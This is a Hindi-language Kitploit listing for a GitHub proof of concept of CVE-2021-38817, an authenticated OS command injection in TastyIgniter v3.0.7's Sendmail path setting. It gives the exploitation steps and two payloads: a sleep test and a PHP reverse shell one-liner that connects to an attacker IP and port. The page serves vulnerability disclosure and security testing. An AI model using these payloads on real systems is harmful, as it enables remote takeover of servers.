Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

TastyIgniter v3.0.7 Sendmail पथ फ़ील्ड में दूरस्थ OS कमांड इंजेक्शन

रिपॉजिटरी देखें
92503 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-38817-दूरस्थ-OS-कमांड-इंजेक्शन

TastyIgniter v3.0.7 के Sendmail वेब भाग में प्रमाणित दूरस्थ OS कमांड इंजेक्शन/दूरस्थ कोड निष्पादन (CVE-2021-38817)

TastyIgniter v3.0.7 रेस्तरां CMS के वेब एप्लिकेशन के Sendmail कॉन्फ़िगरेशन मेन्यू में एक प्रमाणित दूरस्थ OS कमांड इंजेक्शन भेद्यता मौजूद है। Sendmail पथ पैरामीटर उचित रूप से स्वच्छ नहीं किया गया है, जैसा कि फ़ील्ड में संग्रहीत /usr/sbin/sendmail -bs कमांड द्वारा इंगित किया गया है, और अर्धविराम और एक अतिरिक्त OS कमांड जोड़कर मनमाने कमांड को इंजेक्ट करने की अनुमति देता है।

प्रभावित घटक

URL: /admin/settings/edit/mail

फ़ील्ड:

  • मेल प्रोटोकॉल: Sendmail
  • फ़ील्ड: Sendmail पथ

POC

  • /admin पोर्टल में क्रेडेंशियल्स से प्रमाणित करें।
  • /admin/settings/edit/mail पर जाएं।
  • Mail Protocol ड्रॉप-डाउन मेन्यू में Sendmail चुनें।
  • नए SendMail Path फ़ील्ड में एक अर्धविराम और एक मनमाना OS कमांड जोड़ें, उदाहरण: /usr/sbin/sendmail -bs; sleep 10

पेलोड

  • /usr/sbin/sendmail -bs; sleep 10
  • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

TastyIgniterCVE

खोजकर्ता

Matt Kiely (HuskyHacks) तथा Mike Padrick (Fearless), अगस्त 2021

CVE असाइन किया गया अक्टूबर 2022 (हंसी)

टूल डाउनलोड करें